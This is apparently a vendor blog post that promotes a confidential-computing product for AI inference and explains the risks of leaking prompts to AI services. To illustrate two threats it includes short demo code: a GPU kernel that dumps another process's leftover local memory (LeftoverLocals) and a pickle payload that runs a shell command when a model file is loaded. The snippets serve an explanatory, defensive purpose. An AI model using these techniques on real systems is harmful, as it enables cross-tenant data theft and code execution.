

AI security: Here's why you should keep your prompts and responses encrypted and how to go about it

Lara Montoya Laske


Data privacy is blocking AI adoption


In today’s business landscape, AI services like ChatGPT, Claude, Mistral, and others can enhance productivity and efficiency across various industries. These technologies streamline tasks and contribute to overall competitiveness.

 

However, concerns over data privacy, security, and compliance block their adoption. According to a survey conducted by Gartner, organizations are worried about AI security: 50% cited concerns about competitors, partners, or other third parties, and 49% cited malicious hackers. Among organizations that have experienced an AI security or privacy incident, 60% reported a data compromise caused by an internal party.


A survey by BlackBerry found that 67% of respondents saw potential risks to data security and privacy as the biggest reason not to use ChatGPT and similar generative AI tools.

 

When employees use GenAI platforms like ChatGPT, the data they enter passes through four entities: the service provider, the inference provider, the model owner, and the infrastructure provider. Each of these entities has access to your data and is a potential point of exposure while the model owner's workload is being run.


Recent incidents


Several recent incidents highlight the need to protect both the prompts submitted to LLMs and the responses they generate.


Samsung employees leaked company data to ChatGPT


An example of a leak via a service provider, in this case ChatGPT, is the recent incident at Samsung. On three separate occasions, Samsung employees accidentally shared confidential information while using ChatGPT for help at work. In one instance, an employee pasted confidential source code into the chat to check for errors. Another employee shared code with ChatGPT and "requested code optimization." A third shared a recording of a meeting to be converted into notes for a presentation. Samsung responded swiftly by banning employees from using ChatGPT for work-related tasks. The company also announced it is considering developing an in-house AI service to prevent similar incidents.


Samsung is not the only company to restrict employees' use of AI services; many banks, including JPMorgan Chase, Citigroup, Bank of America, Deutsche Bank, Goldman Sachs, and Wells Fargo, have implemented similar restrictions. According to a 2023 study by Cyberhaven, sensitive company data makes up 11% of what employees paste into ChatGPT. Because ChatGPT can use uploaded data to train its models, some of this data could potentially resurface in responses to other users.


Moreover, ChatGPT itself has a history of bugs exposing sensitive data such as payment information, one of which forced OpenAI to take the platform offline for several hours.


GPU vulnerabilities could expose data to the service provider


Data can also be compromised through vulnerabilities in GPUs and shared inference infrastructure. One such vulnerability is LeftoverLocals, which affects GPUs from Apple, Qualcomm, AMD, and Imagination and could plausibly be exploited from the service or infrastructure provider's side.

 
LeftoverLocals allows attackers to recover data that another process left behind in GPU local memory. This means they can eavesdrop on another user's interactive sessions across process or container boundaries. By exploiting the co-residency of multiple programs on shared hardware, attackers gain unauthorized access to sensitive information. All they need is the ability to run programs on the GPU, which does not require special privileges; the code to dump uninitialized local memory is simple, typically fewer than ten lines, and the leftover data can then be collected by the attacker.
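
To make the attack pattern concrete, here is a minimal, hypothetical sketch in Python using PyOpenCL (the original proof of concept uses other GPU frameworks): a "listener" kernel allocates local memory, never writes to it, and simply copies whatever it already contains out to the host. On a vulnerable GPU, that buffer can contain data left behind by another process.

```python
import numpy as np
import pyopencl as cl

N = 4096  # number of floats of local memory to dump per work-group

ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)

# "Listener" kernel: it never initializes local memory, it only copies
# whatever is already there out to a global buffer the host can read.
kernel_src = """
__kernel void dump_local(__global float *out, __local float *leftover, int n) {
    for (int i = get_local_id(0); i < n; i += get_local_size(0))
        out[i] = leftover[i];
}
"""
prg = cl.Program(ctx, kernel_src).build()

out = np.empty(N, dtype=np.float32)
out_buf = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, out.nbytes)

# One work-group; the local-memory argument is allocated but left uninitialized.
prg.dump_local(queue, (256,), (256,),
               out_buf, cl.LocalMemory(N * 4), np.int32(N))
cl.enqueue_copy(queue, out, out_buf)

# On an affected GPU, 'out' may now hold another tenant's leftover data.
print(out[:16])
```

On patched drivers or unaffected hardware this simply returns zeros or noise; the point is how little code a co-resident attacker needs.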


Shared inference infrastructure takeover risk


Another vulnerability rooted in shared inference infrastructure was discovered by Wiz Research. The researchers found that attackers could compromise AI services like Hugging Face by uploading malicious models: code embedded in pickle-serialized models executes when the model is loaded, potentially granting attackers escalated privileges and cross-tenant access to other customers' models. Combined with container escape techniques, this gives attackers access to sensitive data and poses a significant risk of cross-tenant breaches, jeopardizing the security of all models hosted on the platform.
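
To see why pickle-serialized models are so dangerous, here is a minimal, self-contained illustration (with a harmless placeholder command): pickle lets an object dictate how it is reconstructed, so merely loading a "model" file can execute arbitrary code.

```python
import os
import pickle

class MaliciousModel:
    # __reduce__ tells pickle how to rebuild the object on load; returning a
    # callable plus arguments means that unpickling *executes* that callable.
    def __reduce__(self):
        return (os.system, ("echo pwned: code ran during model loading",))

model_bytes = pickle.dumps(MaliciousModel())   # what an attacker would upload

# Any inference service that naively loads untrusted model files like this
# runs the attacker's command inside its own environment:
pickle.loads(model_bytes)
```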


The solution: confidential computing with Edgeless Systems' Continuum AI


We built Continuum AI to protect against all of these threats. Continuum AI leverages NVIDIA GPUs with confidential computing capabilities.

 
Confidential computing is a technology that keeps data encrypted even at runtime, i.e., while it is being processed in memory, using the latest CPUs from Intel and AMD in combination with the latest GPUs from NVIDIA. Additionally, it verifies workload integrity through remote attestation based on cryptographic certificates, ensuring secure data processing even on external infrastructure.
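
As a rough illustration of the remote-attestation idea (this is not a real TEE API, just the core check): the hardware reports a signed measurement, essentially a hash, of the workload it is running, and the client only sends data if that measurement matches a known-good value. A minimal sketch of the client-side check might look like this:

```python
import hashlib
import hmac

# Hypothetical known-good measurement of the approved inference workload.
EXPECTED_MEASUREMENT = hashlib.sha384(b"approved-inference-image-v1").hexdigest()

def verify_attestation(reported_measurement: str) -> bool:
    # Constant-time comparison of the reported workload hash against the
    # expected one; in a real system the report is also signed by the hardware.
    return hmac.compare_digest(reported_measurement, EXPECTED_MEASUREMENT)

print(verify_attestation(EXPECTED_MEASUREMENT))                          # True
print(verify_attestation(hashlib.sha384(b"tampered-image").hexdigest())) # False
```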


Continuum AI is a secure framework for deploying AI models that safeguards user prompts and responses from all other parties. Its threat model accounts for three potential threats: the model provider, the infrastructure provider, and the service provider. The service provider runs the model provider's workload and may use infrastructure from an external provider.

 
In short, with Continuum the AI model runs in a confidential computing environment (CCE) where data stays encrypted in memory. The inference code that processes your prompt operates in a sandbox to prevent data leaks. This ensures two things: (1) the infrastructure can't access your data or the inference code, and (2) the inference code can't leak your data through memory, the disk, or the network. Continuum establishes an encrypted channel between you and the sandboxed inference code: prompts are encrypted on the user side, decrypted only inside the CCE, and responses are re-encrypted before they are sent back, so both remain hidden from the service provider.
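
The end-to-end principle can be sketched in a few lines of Python with an authenticated cipher. This is only an illustration of the idea, not Continuum's actual protocol; assume the session key was established through a key exchange bound to the attestation check described above, so only the client and the sandboxed inference code inside the CCE hold it:

```python
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Hypothetical session key, agreed between client and CCE after attestation.
session_key = AESGCM.generate_key(bit_length=256)
aesgcm = AESGCM(session_key)

prompt = b"Summarize our unreleased quarterly figures."
nonce = os.urandom(12)                             # unique per message
ciphertext = aesgcm.encrypt(nonce, prompt, None)   # encrypted on the user side

# The service and infrastructure providers only ever see 'ciphertext'.
# Decryption happens inside the CCE, where the model processes the prompt:
decrypted = aesgcm.decrypt(nonce, ciphertext, None)
assert decrypted == prompt
```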


In this way, companies can use ChatGPT-like services securely, leveraging the latest AI capabilities while maintaining compliance. For more technical details, read the documentation. We now have a public preview of Continuum, featuring the popular model Mistral 7B, with Llama 3 70B coming soon. Try it out now!


Author: Lara Montoya Laske

